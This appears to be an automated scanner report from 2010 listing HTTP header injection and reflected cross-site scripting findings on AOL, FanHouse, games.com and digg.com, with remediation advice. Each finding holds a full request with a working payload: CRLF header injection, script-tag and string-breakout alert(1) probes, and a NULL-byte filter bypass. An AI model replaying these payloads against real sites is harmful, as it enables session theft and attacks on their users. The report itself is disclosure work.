HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the ES cookie is copied into the Set-Cookie response header. The payload 8d2a0%0d%0ab69f5d02509 was submitted in the ES cookie. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=773969&site=56325597&code=39346973&randnum=3191497 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://golf.fanhouse.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=773969-1-1; ES=8d2a0%0d%0ab69f5d02509
The value of the code request parameter is copied into the Location response header. The payload 9ef9e%0d%0a865f34c67f4 was submitted in the code parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=773969&site=56325597&code=9ef9e%0d%0a865f34c67f4&randnum=3191497 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://golf.fanhouse.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=773969-1-1; ES=773969-v8/mM-0
The value of the site request parameter is copied into the Location response header. The payload 8ffc4%0d%0ade01784bd48 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /adscgen/st.php?survey_num=773969&site=563255978ffc4%0d%0ade01784bd48&code=39346973&randnum=3191497 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://golf.fanhouse.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=773969-1-1; ES=773969-v8/mM-0
The value of the N cookie is copied into the Set-Cookie response header. The payload 6f0c4%0d%0a0b4bfb73e61 was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js HTTP/1.1 Host: tacoda.at.atwola.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close Cookie: JEB2=4D0A45B16E6507448EC1044DF00069F3; ATTAC=a3ZzZWc9OTk5OTk6NjAxMDE=; Anxd=x; Axxd=1; N=2:1b5b3af6671fd812762a203c8d34cbb0,1b5b3af6671fd812762a203c8d34cbb06f0c4%0d%0a0b4bfb73e61; TData=99999|^|#|60101; Tsid=0^1292520884^1292522764|17941^1292520884^1292522764; ANRTT=60101^1^1293125764; CfP=1; AxData=; ATTACID=a3Z0aWQ9MTZna2pkazBwZWtnNXY=;
Response
HTTP/1.1 200 OK Date: Thu, 16 Dec 2010 17:37:29 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Thu, 16 Dec 2010 17:52:29 GMT Set-Cookie: ANRTT=60101^1^1293125764; path=/; expires=Thu, 23-Dec-10 17:37:29 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1292520884^1292522764|17941^1292520884^1292522764; path=/; expires=Thu, 16-Dec-10 18:07:29 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|#|60101; expires=Sun, 11-Dec-11 17:37:29 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Thu, 16-Dec-10 23:37:29 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:1b5b3af6671fd812762a203c8d34cbb06f0c4 0b4bfb73e61,1b5b3af6671fd812762a203c8d34cbb0; expires=Sun, 11-Dec-11 17:37:29 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjAxMDE=; expires=Sun, 11-Dec-11 17:37:29 GMT; path=/; domain=.at.atwola.com Content-Length: 92 Keep-Alive: timeout=60, max=981 Connection: Keep-Alive Content-Type: application/x-javascript
var ANUT=1; var ANOO=0; var ANSR=0; var ANTID='16gkjdk0pekg5v'; var ANSL; ANRTXR();
2. Cross-site scripting (reflected)previous There are 107 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22007"%3b65ad075ef7b was submitted in the REST URL parameter 1. This input was echoed as 22007";65ad075ef7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork22007"%3b65ad075ef7b/aol_pp HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=3244900364.2681801037.1403977984; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Thu, 16 Dec 2010 18:15:55 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10535 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-lm30 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-lm30.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork22007";65ad075ef7b"; s_265.prop2="aol_pp"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5dc8"%3b9679faf62dc was submitted in the REST URL parameter 1. This input was echoed as f5dc8";9679faf62dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetworkf5dc8"%3b9679faf62dc/mem_tos HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334772668.4107864397.299958528; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Thu, 16 Dec 2010 18:16:04 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10537 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld29 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ld29.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetworkf5dc8";9679faf62dc"; s_265.prop2="mem_tos"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bd1e"%3b1f8e242ff0e was submitted in the REST URL parameter 1. This input was echoed as 1bd1e";1f8e242ff0e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /aolnetwork1bd1e"%3b1f8e242ff0e/trademarks HTTP/1.1 Host: about.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 Not Found set-cookie: dcisid=2334838204.1272580429.3974037760; path=/ X-RSP: 1 Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/; Pragma: no-cache Cache-Control: no-store MIME-Version: 1.0 Date: Thu, 16 Dec 2010 18:16:14 GMT Server: AOLserver/4.0.10 Content-Type: text/html Content-Length: 10541 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- START PAGE: acp-ld30 --> <html xmlns="http://www.w3.org/1999/xhtml" ...[SNIP]... <!-- s_265.server="acp-ld30.websys.aol.com"; s_265.mmxgo=false; s_265.pageName="abt : Page Not Found"; s_265.trackExternalLinks="true"; s_265.channel="us.about"; s_265.prop1="aolnetwork1bd1e";1f8e242ff0e"; s_265.prop2="trademarks"; s_265.disablepihost=false; s_265.pfxID="abt"; s_265.linkInternalFilters="javascript:,aol.com"; var s_code=s_265.t(); if(s_code)document.write(s_code) --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72188'><script>alert(1)</script>1e92a6c0f27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/fanhouse72188'><script>alert(1)</script>1e92a6c0f27 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
2.5. http://backporch.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://backporch.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab2b3"-alert(1)-"e52d85f10ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ab2b3"-alert(1)-"e52d85f10ed=1 HTTP/1.1 Host: backporch.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.6. http://backporch.fanhouse.com/2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dcd2"><script>alert(1)</script>c681b57141f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/?6dcd2"><script>alert(1)</script>c681b57141f=1 HTTP/1.1 Host: backporch.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://backporch.fanhouse.com/2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/?6dcd2"><script>alert(1)</script>c681b57141f=1"/> ...[SNIP]...
2.7. http://backporch.fanhouse.com/2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d80b"-alert(1)-"cf5e7047a6e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/barry-cofield-unveils-i-just-tased-myself-sack-dance/?7d80b"-alert(1)-"cf5e7047a6e=1 HTTP/1.1 Host: backporch.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.writ ...[SNIP]...
2.8. http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2afe"><script>alert(1)</script>f46a61c40fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/?a2afe"><script>alert(1)</script>f46a61c40fe=1 HTTP/1.1 Host: blog.games.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpro ...[SNIP]... <meta property="og:url" content="http://blog.games.com/2010/11/10/win-a-trip-to-las-vegas-by-playing-games-com-poker-on-facebook/?a2afe"><script>alert(1)</script>f46a61c40fe=1" /> ...[SNIP]...
2.9. http://boxing.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boxing.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e06fe"-alert(1)-"508b106cf2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e06fe"-alert(1)-"508b106cf2f=1 HTTP/1.1 Host: boxing.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c8833"><script>alert(1)</script>03373126204 was submitted in the REST URL parameter 1. This input was echoed as c8833"><script>alert(1)</script>03373126204 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00c8833"><script>alert(1)</script>03373126204 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
2.11. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasy.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fbaa"-alert(1)-"98ae8076e1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9fbaa"-alert(1)-"98ae8076e1d=1 HTTP/1.1 Host: fantasy.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.12. http://fantasybaseball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasybaseball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4e07"-alert(1)-"caebf6daf08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a4e07"-alert(1)-"caebf6daf08=1 HTTP/1.1 Host: fantasybaseball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.13. http://fantasybasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasybasketball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200fc"><script>alert(1)</script>66fd91e99f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?200fc"><script>alert(1)</script>66fd91e99f1=1 HTTP/1.1 Host: fantasybasketball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <link rel="canonical" href="http://fantasybasketball.fanhouse.com/?200fc"><script>alert(1)</script>66fd91e99f1=1"/> ...[SNIP]...
2.14. http://fantasybasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasybasketball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc8f8"-alert(1)-"045ee1fee21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?dc8f8"-alert(1)-"045ee1fee21=1 HTTP/1.1 Host: fantasybasketball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.15. http://fantasyfootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fantasyfootball.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86285"-alert(1)-"a843d937da8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?86285"-alert(1)-"a843d937da8=1 HTTP/1.1 Host: fantasyfootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.16. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://golf.fanhouse.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e6f7"-alert(1)-"76c2672023b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4e6f7"-alert(1)-"76c2672023b=1 HTTP/1.1 Host: golf.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.17. http://golf.fanhouse.com/leaderboard/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://golf.fanhouse.com
Path:
/leaderboard/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5d6"><script>alert(1)</script>9c3c14a29ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /leaderboard/?da5d6"><script>alert(1)</script>9c3c14a29ce=1 HTTP/1.1 Host: golf.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
Response
HTTP/1.0 404 /leaderboard/ Date: Thu, 16 Dec 2010 18:16:20 GMT Server: Apache-Coyote/1.1 Content-Type: text/html Set-Cookie: JSESSIONID=28F7CBFCAE5817613F934A5C4945D0B1; Path=/ Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta h ...[SNIP]... <link rel="canonical" href="http://golf.fanhouse.com/leaderboard?da5d6"><script>alert(1)</script>9c3c14a29ce=1"/> ...[SNIP]...
2.18. http://mlb.fanhouse.com/2010/12/15/bob-feller-hall-of-fame-pitcher-dies-at-92/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a733f"-alert(1)-"343c8ebcf3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/12/15/bob-feller-hall-of-fame-pitcher-dies-at-92/?a733f"-alert(1)-"343c8ebcf3c=1 HTTP/1.1 Host: mlb.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3076c"><script>alert(1)</script>24631300338 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/bob-feller-hall-of-fame-pitcher-dies-at-92/?3076c"><script>alert(1)</script>24631300338=1 HTTP/1.1 Host: mlb.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad45"><script>alert(1)</script>38330725520 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/12/15/bob-fellers-delivery-fierce-to-the-finish/?fad45"><script>alert(1)</script>38330725520=1 HTTP/1.1 Host: mlb.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) Connection: close
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f736a"-alert(1)-"bb8742feec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
